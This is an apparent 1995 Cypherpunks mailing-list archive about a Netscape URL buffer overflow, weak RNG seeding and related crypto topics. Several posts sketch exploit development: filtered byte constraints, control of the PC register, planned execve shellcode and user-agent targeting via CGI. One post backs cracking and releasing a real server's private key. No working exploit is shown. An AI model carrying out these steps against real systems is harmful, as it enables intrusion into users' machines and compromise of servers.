already using the business intelligence (all companies are just not calling it
the BI): some more successfully than others. The business intelligence can be
used both for strategic and tactical purposes.

Regards,
Mark

From ab411 at detroit.freenet.org Fri Sep 22 10:24:42 1995
From: ab411 at detroit.freenet.org (David R. Conrad)
Date: Fri, 22 Sep 95 10:24:42 PDT
Subject: Another Netscape Bug (and possible security hole)
Message-ID: <199509221724.NAA18084@detroit.freenet.org>

Jeff Weinstein writes:

> Not that I want to divert attention away from netscape(OK, maybe I
> do :-) ), but does this bug exist in any other common browser?

Lynx can handle it on the info page (reached by pressing '='), but:

In response to selecting the long domain name found in the Warning link in
http://www.grfn.org/~conrad/test.shtml, lynx replied:

- - -
Sorry, you have encountered a bug in Lynx Ver.
2-4-2

Please send a concise mail message to

        lynx-bug at ukanaix.cc.ukans.edu

describing what you were doing, the URL you were looking at or attempting to
access, your operating system name with version number, the TCP/IP
implementation that your system is using, and any other information you deem
relevant. Do not mail the core file if one was generated.

Lynx now exiting with signal: 11

Exiting via interrupt: exit(0)
- - -

[No core file was generated]

My system is: (uname -a)
Linux russell 1.3.26 #2 Thu Sep 14 08:34:38 EDT 1995 i486

Netscape 1.1N for linux crashed in a way that locked my system up, and caused
endless trashing. I had to reboot, but my filesystem was undamaged. Not sure
why it crashed and burned on my system while others have gotten such nice SegVs
and core files. I guess I managed to get just the right (wrong) thing onto the
stack. :-) :-(

(P.S. Whoops, just realized that I rebooted with a different kernel; Lynx did
indeed crash under 1.3.26 (post-reboot), but Netscape crashed under 1.2.13
(pre-reboot). Pardon me if I don't re-try under 1.3.26, but having X lock up
and hearing my disk trash is not something I relish.)

drc

Last line above should read: "hearing my disk *thrash* ...," not trash.
Signing messages is non-trivial with my current set up, so I don't feel like
re-doing it for such a minor glitch.

--
David R. Conrad, conrad at detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee -- Finger conrad at grfn.org for public key
Key fingerprint = 33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.
From rjc at clark.net Fri Sep 22 10:29:48 1995
From: rjc at clark.net (Ray Cromwell)
Date: Fri, 22 Sep 95 10:29:48 PDT
Subject: YET ANOTHER BAD NETSCAPE BUG (no it isnt!)
Message-ID: <199509221729.NAA16470@clark.net>

Just another reminder that the second bug I posted about was a fluke on my
system and not a real bug. I'm hoping that putting the reminder in the subject
will stop people from forwarding it on to other lists before reading the
retraction. Although this was a false bug, the overflow bug is very real and
verified.

-Ray

From jsimmons at goblin.punk.net Fri Sep 22 10:32:29 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Fri, 22 Sep 95 10:32:29 PDT
Subject: Netscape for Linux?
In-Reply-To: <43tmht$qfe@tera.mcom.com>
Message-ID: <199509221728.KAA07352@goblin.punk.net>

> > In article <199509212125.RAA00188 at hoopsnake.cjs.net>, cjs at netcom.com (Christopher J. Shaulis) writes:
> > And the sad part is that now that they have announced that they are
> > dropping their unofficial Linux support, I really want to hurt
> > Netscape badly.
>
> This is news to me. We have engineers spending valuable time keeping
> our linux port running. If you tell me where you saw this, I will look
> into it.
>
> --Jeff
>

I, and many other Linux users that I know, have repeatedly contacted Netscape
offering to pay for a Linux version of Navigator - we have usually been either
'brushed off' or completely ignored. And now there is no mention of a Linux
port of v2.0 - not surprising that this 'rumor' is running around.

I think a statement by you or someone else at Netscape supporting a Linux
version would go a long way in reassuring the Linux community, even if it's
something that is going to take a while.

And you might want to drop by the usenet comp.os.linux.* hierarchy - they're
already working on ways to use your html extensions to design web pages that
can't be read by Navigator ...
--
Jeff Simmons                    jsimmons at goblin.punk.net

From goedel at tezcat.com Fri Sep 22 10:38:08 1995
From: goedel at tezcat.com (Dietrich J. Kappe)
Date: Fri, 22 Sep 95 10:38:08 PDT
Subject: Netscape bug and the IMG tag.
Message-ID:

You can plunk a nasty url into the SRC field of an IMG tag, thus eliminating
the need for clicking on the offending url. Also, it makes it harder to check
the html of a page. Check out http://www.redweb.com/experiment/bug2.html if
you feel like rebooting.

Dietrich Kappe   | Red Planet     http://www.redweb.com
Red Planet, LLC  | "Chess Space"  | "MS Access Products"  | PGP Public Key
1-800-RED 0 WEB  |   /chess       |   /cobre              |  /goedel/key.txt
Web Publishing   | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84

From akjoele at shiva.ee.siue.edu Fri Sep 22 10:42:02 1995
From: akjoele at shiva.ee.siue.edu (Arve Kjoelen)
Date: Fri, 22 Sep 95 10:42:02 PDT
Subject: XDM has the same problem as netscape ?!
Message-ID: <199509221741.MAA27447@shiva.ee.siue.edu>

Ian Goldberg wrote:
>Nelson Minar wrote:
>>Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had
>>the same problem: the random seed was based on the current time to the
>>microsecond, modulo the granularity of the system clock. I think I
>>figured that on my hardware, if I could figure out which minute the X
>>server started (easy with finger), I'd only have to try a few
>>thousand keys or so. Caveat: I never actually proved the idea.
>Wow. I just checked, and Nelson's right.
>[ code extracts snipped]

I just checked X11R6, and the same method is used there, so it hasn't changed
since X11R4.

-Arve.

From somogyi at digmedia.com Fri Sep 22 10:45:53 1995
From: somogyi at digmedia.com (Stephan Somogyi)
Date: Fri, 22 Sep 95 10:45:53 PDT
Subject: "Gnusaic"?
 Why not a Gnu-Style Web Browser?
Message-ID:

At 23:23 21.9.95, Alex Tang wrote:

> Yes. This has been done. A set of patches for NCSA's HTTPd (for US
> folks only) can be found at
>
> http://petrified.cic.net/~altitude/ssl/howto.html
>
> I got the patches from the ssleay gang in AU, but i haven't seen them on
> their ftp site yet, so if you're outside the states, it'll be available
> rsn (i think...)

Has anyone already created the necessary patches for Apache, or does anyone
know whether the Apache dev team would be amenable to including conditional
directives to allow the build of a secure version? If anyone is thinking of
making the effort to create a publicly available secure server, Apache's
probably the best source base to work with.

________________________________________________________________________
Stephan Somogyi   Think Tank   Grenadier   Digital Media

From frissell at panix.com Fri Sep 22 10:56:39 1995
From: frissell at panix.com (Duncan Frissell)
Date: Fri, 22 Sep 95 10:56:39 PDT
Subject: Another Netscape Bug (and possible security hole)
Message-ID: <199509221756.NAA15178@panix.com>

At 01:17 PM 9/22/95 -0400, Thomas Grant Edwards wrote:
>On Fri, 22 Sep 1995, Dietrich J. Kappe wrote:
>
>> Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try
>> it out, I've put up a simple page with the url at
>> http://www.redweb.com/experiment/bug.html
>
>Netscape also crashes (error 1) on regular Macs...sigh. I'm contacting
>someone who just wrote a http server to see how tough it would be drop
>some code on the stack.
>
>-Thomas

On my 486 running Windoze for Workgroups 3.11 and the latest Netscape Beta it
causes Netscape to die but doesn't lock me up. Generally I've found Netscape
blows up in a much friendlier way than other Windoze programs. I can often
recover the Netscape session itself and it doesn't lock me up as much.
DCF

From ghio at utopia.hacktic.nl Fri Sep 22 10:59:07 1995
From: ghio at utopia.hacktic.nl (Matthew Ghio)
Date: Fri, 22 Sep 95 10:59:07 PDT
Subject: Crypto Sync Issue
In-Reply-To: <199509191846.LAA24272@netcom4.netcom.com>
Message-ID:

Tom Rollins wrote:
> I am interested in encrypting a SLIP link between my
> PC (running Linux) and my Netcom shell account (running
> SLIRP).
>
> My question has to do with error conditions on the line.
> If I drop a character or packet, the two sides will lose
> crypto sync and result in things scrambled from then on.
> The modems will fix most of the low level problems.
> However, Murphy's Law has not been repealed. :)
>
> Are there any standard methods to provide the SYNC between
> the sender(encryption) and the receiver(decryption) on
> an Async connection ?
>
> Since Slip uses IP packets, I was planning on an encryption
> of the data portion of the IP packets (leaving the header
> alone).

A better approach would be to encrypt the entire IP packets and leave the framing bytes alone. But this is what I do:

I use regular unencrypted SLIP (slirp) between here and netcom. Also install copies of slirp in all your other unix accounts, plus your favorite session encryption daemon (deslogin, ctcp, ssh, esm, etc). Then make some script files like this. For this example I use deslogin to establish a secure session with utopia.hacktic.nl.

/root/dialup:

#!/bin/csh
dip /root/netcom.dip
/sbin/agetty 38400 ttyqf -l /root/utopiadeslogin &
dip /root/utopia.dip

/root/utopiadeslogin:

#!/bin/csh
exec /usr/local/bin/deslogin ghio at utopia.hacktic.nl

/root/utopia.dip:

port ptyqf
wait ogin: 60
send anything\n
wait d: 5
send password\n
wait ] 5
send \n
send exec slirp-0.9o/src/slirp\n
get $rmtip 10.0.2.42
get $locip 10.0.2.16
mode CSLIP

Add to /etc/hosts:

10.0.2.42 utopia-secure

Then I can do:

telnet utopia-secure

and everything is encrypted. I got deslogin from utopia's anon-ftp dir. A 3DES version would be nice tho.

When you want to hangup, use this to kill all of the dip processes:

#!/bin/csh
ps -ua|grep " pQf "|awk '{print "kill " $2}'|csh
ps -ua|grep " pS1 "|awk '{print "kill " $2}'|csh

To do this for more hosts, just pick any available IP addresses in 10.0.2.x and a free tty (ttyq* are usually unused).

From lethin at ai.mit.edu Fri Sep 22 11:13:25 1995
From: lethin at ai.mit.edu (Rich Lethin)
Date: Fri, 22 Sep 95 11:13:25 PDT
Subject: Worms and New Netscape Bug
Message-ID: <199509221813.OAA10129@grape-nuts.ai.mit.edu>

Although Netscape will certainly fix their new bugs, it's likely that many old copies will remain on computers on the net, and the holes will remain.

Netscape could "fight" against this with a modified worms/webcrawler which looks for blatantly dangerous domain names in URLs and reports them to "CERT" or blockware companies like Surfwatch. For example, they'd find the foo* link at the bottom of My page

Not a complete solution obviously (e.g. the server could selectively reply to requests, and hide from the webcrawler IP).

What happens when someone using the AOL browser clicks on one of these HREF's... does it crash all of AOL?

---
Concurrent VLSI Arch. Group
545 Technology Sq., Rm. 610
MIT AI Lab
Cambridge, MA 02139
(617)-253-0972

From sameer at c2.org Fri Sep 22 11:28:44 1995
From: sameer at c2.org (sameer)
Date: Fri, 22 Sep 95 11:28:44 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221713.NAA11980@clark.net>
Message-ID: <199509221823.LAA19265@infinity.c2.org>

Suggestion: Once you figure out how to exploit it for a particular platform write a cgi-script which checks the USER_AGENT (or whatever it is called) environment variable to make sure the netscape that has reached your exploit is the same platform as the exploit was written for.

> > Perry writes:
> > > These buffer overflow bugs should be taught in every programming
> > > 101 course along with fencepost errors.
> > >
> > > I'm not even sure if I want to write the obligatory program to exploit
> > > the hack given that some malicious jerk would probably use it
> > > on his home page to attack people.
> >
> > The problem is that if you don't produce a (benign) exploit people
> > aren't going to take it seriously enough.
>
> Yeah, I guessed that. I'll work on it, I have a few doubts I have
> to research first. For instance, how to embed code in the domain that
> 1) server/client processing won't "cook" and 2) contains no isolated
> zero bytes which would null terminate the string.
>
> My current idea is to look in Netscape for an "exec" routine,
> and call it passing a "/bin/csh" to it.
>
> Irregardless, it's a nasty bug given that you can crash anyone's
> netscape. And on Mac/Win3.1, it may even require a reboot.
>
> -Ray

--
sameer Voice: 510-601-9777
Community ConneXion FAX: 510-601-9734
An Internet Privacy Provider Dialin: 510-658-6376
http://www.c2.org (or login as "guest") sameer at c2.org

From koontz at MasPar.COM Fri Sep 22 11:51:21 1995
From: koontz at MasPar.COM (David G. Koontz)
Date: Fri, 22 Sep 95 11:51:21 PDT
Subject: Project: a standard cell random number generator
Message-ID: <9509221852.AA23179@argosy.MasPar.COM>

>At 02:50 PM 9/20/95 -0700, you wrote:
>> In this sense, NSA ought to be *encouraging* Intel and
>>IBM and Motorola to put "generate random bits" instructions into
>>their instruction sets...

Intel produces a random generator (in a chip package) that is used in STU-II..'s. You can't buy such devices, random sources good enough to be used for initialization for military grade cryptography are Controlled Cryptographic Items. One would think that the NSA is attempting to exploit the lack of availability of random initialization values against their targets. The question becomes one of whether or not the general populace (of the U.S.) is considered a potential target, or simply casualties of the situation in undeclared hostilities.

As a minimum one could infer that the availability of random numbers is considered quite important for NSA secure communications.

I used to work at a company that subscribed to NSA (National Standards Association) which provided government and other standards on microfiche and/or hardcopy. There was an interval before Reagan took office when the NSA provided all of their unclassified standards into general availability, an era of openness that came to an end with the Star Wars era. One of those standards was for random data sources.

The only recent standards that come to mind are the X.509 stuff for session key generation, FIPS PUB 140-1 which describes randomizer tests, and the recent FIPS PUB for a password generator. These three use block ciphers to produce pseudo-random output.

If NSA requires real stochastic results for military crypto, what would we as casual cryptographers feel comfortable with? The Netscape episode shows the comfort level needs improving. How good is good enough?

From microbody at wirepool.ruhr.de Fri Sep 22 12:06:19 1995
From: microbody at wirepool.ruhr.de (Matthias Jordan)
Date: Fri, 22 Sep 95 12:06:19 PDT
Subject: Netscape sub rosa?
In-Reply-To:
Message-ID: <5uIxesBWJ2B@blank.wirepool.ruhr.de>

Hello, Tim!

> Gee, where's that "Cypherpunks logo" when you really need it?
>
> A rose covering the Netscape "N" logo? A crypto eagle swooping down and
> pecking at weak keys?

How about an anarchism-A (an A in a circle) with the circle not being totally closed thus describing a C?

CU!
/\/\icroBod\/

|\?/| SoziBits <---- Attacks Drugs Weapons
/ \______/ | I | Falcons on the Net RAF ETA KGB LSD XTC BND
^ PGP2.3a key per EmpfBest.
---
Ask me about PGP -- Whoever does not want to talk about capitalism should keep quiet about fascism

From alt at iquest.net Fri Sep 22 12:10:46 1995
From: alt at iquest.net (Al Thompson)
Date: Fri, 22 Sep 95 12:10:46 PDT
Subject: The Next Hack
Message-ID:

At 05:01 AM 9/22/95 -0400, Futplex wrote:
>sameer writes:
>> 2) Organize a net-wide search over the space of the RNG seed to
>> crack the private key of some well known secure server.
>>
>> 3) Release the private key to the net.
>
>FWIW, for the record, I'm uncomfortable with this. It sounds unethical, IMHO.
>
>For me at least, targeting the key of some particular server that happens to
>be out there is over the line.
>
>If you said you would have someone volunteer a supposedly secure server for
>the challenge, I'd have no qualms.

I might disagree with the part about releasing it to the net, but I don't disagree with targeting a server which is claimed to be "secure." Why? Nobody would have been too upset or surprised if someone had built the Titanic for the sole purpose of trying to sink it. It only made waves (pun alert) because it was claimed to be "unsinkable" (secure), but sank anyway.

Maybe a good tactic would be to crack a "secure" server, and send the results ONLY to the server operators, along with a description of machine-time involved. Put out a public press release, describing the machine-time involved, how it was possible due to weak crypto imposed by the government, and the possible economic and commercial implications of said weak crypto.

From jsimmons at goblin.punk.net Fri Sep 22 12:21:44 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Fri, 22 Sep 95 12:21:44 PDT
Subject: Netscape for Linux
Message-ID: <199509221917.MAA07561@goblin.punk.net>

Found this on Comp.os.linux.misc - hope it's true:

Tobias Engel writes:
>I looked at the Data Sheet-Page for the Netscape Navigator 2.0 today (http://home.netscape.com/comprod/products/navigator/version_2.0/datasheet.html).
>There is a "Supported Platforms"-List at the end of the Page. For Unix it
>says:
>---
>Digital Equipment Corp. Alpha (OSF/1 2.0)
>Hewlett-Packard 700-series (HP-UX 9.03)
>IBM RS/6000 AIX 3.2
>Silicon Graphics (IRIX 5.2)
>Sun SPARC (Solaris 2.4, SunOS 4.1.3)
>386/486/Pentium (BSDI)
>---
>So, where is Linux???

In comp.infosystems.www.browsers.x Jamie Zawinski said that there *will* be a 2.0 version for Linux. He also explained why Linux isn't listed and why Netscape will tell you that there will not be a supported version of Netscape for Linux. This is a copy of that article, which is worth reposting here, I think, because of the large threads about this subject:

From: Jamie Zawinski
Newsgroups: comp.infosystems.www.browsers.x
Subject: Re: Netscape 2.0 for Linux
Organization: Netscape Communications
Date: Wed, 20 Sep 1995 16:11:19 -0700

Marco Trincardi wrote:
>
> There will be a Linux version of the new upcoming Netscape 2.0 ???
> At Netscape HomePage i didn't find useful info.

And I replied:
>
> Yes, once 2.0 is released (please don't ask me when) it will be
> available for all platforms on which 1.1 is available.

Since then, it would seem that some folks have called our customer support lines and gotten a seemingly different answer, so allow me to clarify:

When someone in customer support tells you "we will not be supporting Linux in Netscape 2.0," they're right: but that's because we didn't support it in 1.0 or 1.1 either.

"Support" means we sell the software, and you can buy a support contract. This is not, and has never been the case for Linux. You have never been able to get a *supported* version of Netscape Navigator for Linux. We have no Linux *product*; our sales and support folks don't deal with it in any way, and never have.

However, there has been an unsupported educational/evaluation version available for that platform, and this will also be the case for 2.0.
--
Jamie Zawinski jwz at netscape.com http://www.netscape.com/people/jwz/

--
-- Jos Vos -- X/OS Experts in Open Systems BV | Phone: +31 20 6938364
-- Amsterdam, The Netherlands | Fax: +31 20 6948204

--
Jeff Simmons jsimmons at goblin.punk.net

From adam at homeport.org Fri Sep 22 12:27:31 1995
From: adam at homeport.org (Adam Shostack)
Date: Fri, 22 Sep 95 12:27:31 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221243.IAA03781@frankenstein.piermont.com>
Message-ID: <199509221927.PAA16372@homeport.org>

Perry E. Metzger wrote:
| I don't believe the Sun Java stuff would suffer from it, although I
| fear Java a great deal.

I keep hearing this thought. Isn't Win95 with its 'executables in email' much more dangerous than Java, which at least tries to address security?

There is the argument that the claims will inspire false confidence in Java's security mechanisms, and thus people will be bitten, but I don't buy it. People don't look to security as a check item when buying software. And when they do, they're usually not capable of distinguishing between the pap that passes for security through marketing from security by design.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From shamrock at netcom.com Fri Sep 22 12:46:37 1995
From: shamrock at netcom.com (Lucky Green)
Date: Fri, 22 Sep 95 12:46:37 PDT
Subject: The Next Hack
Message-ID: <199509221944.PAA06418@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <199509211832.LAA24086 at infinity.c2.org>, sameer at c2.org (sameer) wrote:
>Proposal for action:
>
>1) Reverse-engineer a server to see if the keygen phase uses
>a weak RNG seed. -- if so, determine the exact algorithm.
>
>2) Organize a net-wide search over the space of the RNG seed to
>crack the private key of some well known secure server.
>
>3) Release the private key to the net.

Count me in. Let's start with Netscape's own.

- --
- -- Lucky Green PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGMSJSoZzwIn1bdtAQFqiwF+IZKDv1t5Q2va2yE2JZMCHGITkxoDHHML
alvjYK+XyxPNaVGgRgMk5gTsZMcHqBvz
=meVk
-----END PGP SIGNATURE-----

From dmandl at panix.com Fri Sep 22 12:47:17 1995
From: dmandl at panix.com (dmandl at panix.com)
Date: Fri, 22 Sep 95 12:47:17 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221927.PAA16372@homeport.org>
Message-ID:

On Fri, 22 Sep 1995, Adam Shostack wrote:
> Perry E. Metzger wrote:
>
> | I don't believe the Sun Java stuff would suffer from it, although I
> | fear Java a great deal.
>
> I keep hearing this thought. Isn't Win95 with its
> 'executables in email' much more dangerous than Java, which at least
> tries to address security?

Is that the new MS-Word you're thinking of? I hear that it lets you embed macros containing executable code in documents. That's got to be one of the most dangerous ideas ever cooked up.

--Dave.

--
Dave Mandl
dmandl at panix.com
http://wfmu.org/~davem

From cman at communities.com Fri Sep 22 12:52:58 1995
From: cman at communities.com (Douglas Barnes)
Date: Fri, 22 Sep 95 12:52:58 PDT
Subject: Another Netscape Bug (and possible security hole)
Message-ID:

Spent too much time last night playing with the Netscape bug; among other things wrote some code to throw various random binary URLs at Netscape. Netscape seems prepared to swallow the bait as long as the URL does _not_ contain characters screened as follows:

if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) {

This means you can't plant 0x00, 0x22, 0x3e or 0x2f. Anything else can be made to show up in various registers after things go blooey.
I've only made it segfault in different places so far, still working on getting it to do something it wouldn't ordinarily do and not crash before it does it.

[Working under Solaris 2.4; I may try my luck on Macs, since this bug crashes the whole OS... need to load up debug tools first though.]

Hope this helps others...

Doug

From frenchie at magus.dgsys.com Fri Sep 22 13:04:54 1995
From: frenchie at magus.dgsys.com (SysAdmin)
Date: Fri, 22 Sep 95 13:04:54 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <43tpv8$rom@tera.mcom.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

While browsing my mail I noticed that Jeff Weinstein wrote:
>
> OK, Perry was right, and it was wrong of me to argue with him based
> only on the code that I have personally seen. As we have already
> determined, I have not reviewed every line of code in netscape.
>
> Not that I want to divert attention away from netscape(OK, maybe I
> do :-) ), but does this bug exist in any other common browser?
>
> --Jeff
>
> --
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw at netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.

TkWWW under Linux 1.2.12 dies with a Segmentation Fault with this bug :(

- --
=====================PGP Encrypted Mail Preferred========================
PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request.
As soon as any man says of the affairs of the state " What does it matter to me? " the state may be given up for lost.
J.J.Rousseau - The Social Contract
GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r y++ [Geek Code v3.0]
a.k.a [ root at magus.dgsys.com / vamagus at delphi.com]
==========================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAgUBMGMWyLbmxeO+s+1xAQEa4gP8DLVEoZwrVtqMpztIrCH6sSAdEoUZf3jU
c2AgSNwvqv4/CbGeTxZ7UBFO4hjbUJPlmvwfY0J6yAfsKnYvSxKL55VtbAQzSuac
2KjUSIUh23wpe9hpJaURpK8NM6tlDs2GsoVmdIRL1wFpdwurAeijH1JhSqrJFdKN
b+/jeyTw9+0=
=7ZJq
-----END PGP SIGNATURE-----

From rjc at clark.net Fri Sep 22 13:19:13 1995
From: rjc at clark.net (Ray Cromwell)
Date: Fri, 22 Sep 95 13:19:13 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To:
Message-ID: <199509222018.QAA11163@clark.net>

>
> Spent too much time last night playing with the Netscape bug;
> among other things wrote some code to throw various random binary
> URLs at Netscape. Netscape seems prepared to swallow the bait
> as long as the URL does _not_ contain characters screened as
> follows:
>
> if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) {
>
> This means you can't plant 0x00, 0x22, 0x3e or 0x2f.

Did you check 0x20 and 0xa0? (space and shift-space) I'm sure that a space will terminate the href in .

I've been playing around with Netscape today and I achieved two things. First, I've isolated a routine very near to where it crashes (if I set a breakpoint in GDB, it only hits the breakpoint when a domain is looked up by any method) Secondly, even without disassembly I've been able to place an exact value in the PC register (0x61616161). Now, all that's left is to 1) find out where the stack pointer is, 2) make the PC point to some area near the stack pointer, and 3) create some code which does a syscall on execve with "xterm" as the argument, with the restriction that it cannot contain any of the above illegal codes.
#3 is the hardest for me since I've never done assembly under BSDI but I assume it's some sort of trap call I need to do. Once all that is done, just package it up into a URL and you are set to wreak havoc.

If someone else exploits the hole before I do, I would urge you not to reveal the exact implementation to any mailing lists for the simple reason that even a benign exploitation can be easily modified to be dangerous. Security through obscurity, I know, but think about it. Once you have the URL, anyone can exploit the bug by pasting it into their home page. And with the way the net works, this would probably seem "cool" to most people and it would spread like wildfire. If you don't reveal the implementation, then perhaps that will buy enough time for most users to upgrade to Netscape 2.0 before crackers start exploiting it.

[this bug is far more dangerous than the RNG bug or the 40-bit crypto]

-Ray

From adam at homeport.org Fri Sep 22 13:19:43 1995
From: adam at homeport.org (Adam Shostack)
Date: Fri, 22 Sep 95 13:19:43 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To:
Message-ID: <199509222019.QAA16468@homeport.org>

dmandl at panix.com wrote:
| On Fri, 22 Sep 1995, Adam Shostack wrote:
| > I keep hearing this thought. Isn't Win95 with its
| > 'executables in email' much more dangerous than Java, which at least
| > tries to address security?
|
| Is that the new MS-Word you're thinking of? I hear that it lets you
| embed macros containing executable code in documents. That's got to
| be one of the most dangerous ideas ever cooked up.

No, this is a separate problem. It's not auto-executing code in Microsoft documents that worries me, so much as the ability to include executables as clickable images in a mail message, with the user having no control over what environment the program executes in.

If strong fences make good neighbors, where are the fences in my network neighborhood?

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From dvw at hamachi.epr.com Fri Sep 22 13:19:55 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Fri, 22 Sep 95 13:19:55 PDT
Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <306319E6@hamachi>

Perry E. Metzger at Sep 22, 95 01:19:37 am wrote:
>David Van Wie writes:
>> It just moves the prior art date from the date of invention to the date
>> of filing the patent application.
>What happens if the chronology goes like this ?
>
>(0) Alice invents a snaffleblort.
>(1) Bob invents a snaffleblort.
>(2) Bob files for a patent on a snaffleblort.
>
>From what you said, it would appear that Alice's prior art won't count when
>it comes to considering the validity of Bob's patent claim. Is that correct ?

Unless Alice made public statements about her invention, you are right. Something becomes prior art when it is made public. If she (like most patent lawyers will advise) kept her mouth shut about what she had invented until her patent application was filed, she would lose under first to file rules (assuming step three is that Alice files a patent application).

A quick trip to the soapbox:

First to file rules are good for big companies, and bad for small inventors. Big companies have many lawyers, and know exactly how each step of the process works. Small inventors usually don't know the process as well, usually have to scrape together the thousands of dollars necessary to pursue a patent, and then find a good lawyer that they can trust -- all while ensuring that they don't break one of the rules about how you must treat your invention before filing.

Moral: First to invent rules, like "natural copyright," are good for the little guy because they base patent decisions on when the important things (i.e. invention and reduction to practice) happened, not administrative things (i.e. complex documents filed with dotted i's and crossed t's).
From tytso at MIT.EDU Fri Sep 22 13:40:17 1995
From: tytso at MIT.EDU (Theodore Ts'o)
Date: Fri, 22 Sep 95 13:40:17 PDT
Subject: /dev/random for Linux
In-Reply-To: <199509210349.XAA06110@frankenstein.piermont.com>
Message-ID: <9509222039.AA25206@dcl.MIT.EDU>

> > On this same track, I suggest that "/dev/random" devices for unix are
> > an excellent idea. Ted Tso did one for Linux that steals all the bits
> > of semi-random timing information it can.
>
> Anyone know where I can find more information on this wonderful device?

I've just sent patches (versus the Linux 1.3.28 kernel) off to Linus. There's a fairly long exposition at the beginning of drivers/char/random.c which explains its theory of operation.

There are some things that I had wanted to do to make it better; for example, not use MD5 in the inner bucket-mixing, but use a CRC-based mixing algorithm that Colin had suggested; this should be much faster, and since I'm using MD5 on the output side of the random number generator, it should be good enough. Also, at some point I want to add code so that it can sample the Pentium instruction cycle clock register, which will give us a much finer granularity clock with which to measure events.

However, given the current interest in random number generators --- thank you Netscape for providing such a wonderful object lesson! :-) --- and keeping in mind the saying that the best is often the enemy of the good, I've decided to make what I have available now, and worry about improving it later.

In any case, here it is. With any luck, it'll be included in the 1.3.29 Linux kernel; the idea is that application programs running under Linux should be able to assume that /dev/random exists and that they can rely on it. Perhaps if enough free OS's do this, commercial OS vendors will get shamed into providing /dev/random on their Unix systems.
Or better yet, perhaps hardware vendors will decide it's worth including the $10 (if that) worth of parts necessary to have a real, hardware-based random number generator in their machines. If there are any representatives from such computer manufacturers, please consider this a hint. :-) - Ted begin 644 patches.random.gz M'XL("'WS8C " W!A=&-H97,NCSOQ9)%201O MVG$VM$39G)4E#4G9DY?-:!I @\0:!!@A&BW/G:#K/Q$0M1<,2C>:;=N--LT-;VB]^_EF<7 MIQ>O7YR*UR+?*W#W0"1I'(4S,RC";&&K6,Q4J&*91C%MX$V?<;4?A:)^WF_4 M1""35"PBU_=\Y>+N,Y!PADMI)?]U&2W7L3^;IV(Z5Y$;Q4I,DU=1C=GAO]OG M0 at R"0/"J1,0J4?&3^&D*PI=Q].2[^)'.98J_% X* M at FCE0R!.%+H^;4KX&-JX4.D;?K#.MZA+1.3E9#F1BZ49!!2K5()<.E?:T1-- M&:GP*?@31JGOJ!JS0LM4F/HYA0G+6Z\@KGU(2<^GZUI^@!\Z0>82O;0=)#F! M]!?0(.A9R1A:37V5L%!%8Y=J'%N18$XUQ.)FN/0 PM.YGX@ 9]*%I<@*ADIY M5FC3,LF/* MJ&'J,Q@"G;,FBH6MR(1 601)PBAA3IC%V8LH+>C1W$/8KB*//.+$:"YDNFT M*ZSA\BP$&P:)<,;J=3(>#*W%W75$[G!*$.*Q2N.OQE(B%%MD/M5^$ MRE%)0A;D9HH$*\42PH39R4#8T at 5%(%SR&> M72D5EE2$;L%-]2ZR)'(=1=MQ MXOO)U5F2KH.*(9Z?E"*=?AQ-Q.3N>OIE,!X*_+X?WWT>70VOQ+_^-9A at X-4K M,;B]PO]^$<-_W(^'DXFX&XO1I_N;T?"*C\#.\>!V.AI.:A#%YCV0TV\ M?YB*V[NIN!E]&DUQWO2NAMN&^=;*-CX%POLT'%]^Q-#@_>AF-/V%[[T>36_I MSFM<.A#W at _%T=/EP,QB+^X?Q_=UD*$ V[[\:32YO!J-/PRM(>W2+J\7P\_!V M*B8?!SF)B;W MP\L1_1C^8PCZ!V.8'S9?WMU.AG]_P"),BJO!I\$'P\[QGT@"8KY\& \_$85@ M??+P?C(=31^F0_'A[NZ*9,S'3(;CSZ/+X>2MN+DCR5^+A\FPAINF R8 QT!" MF":^'B8CEM7H%FXR?KB?CNYNM:H_WGV!,$#O -NO6+!WM\PZY'(W_H4.)IFP MW&OBR\SFDV3LZ MZN_#'#W XN - 3J],^*4=98CV)T+097GW'.56XNM $F M,!D9R77Y_3G1%3< M@[PVQB(XE)A)BJR429Y\)'X.O &"HP^7YD ',$()QZ"-FE"I+ MX:"S*'(W,0.6)IF?2CN at J!\+)UXOTV at 6RR7B$85='0/?JP1Q/&%B(_O)C[)D M=VE"<1& (#^:LR_20,3W\CET1:(4I[[IY3U^_YZIT%$E-42N3B/+0")((3 J M'..G>>@"&0A]3##BUEP^E??I&$JW4MJ(PF!MF*T)A&6LC2F)\"E+1$^$+6&O M<:.0:2J=KRHN80SA'T1'Z"=:$J9"?./Q=[M_JO!IL43X-YQ#$>O\'B97ZXA" 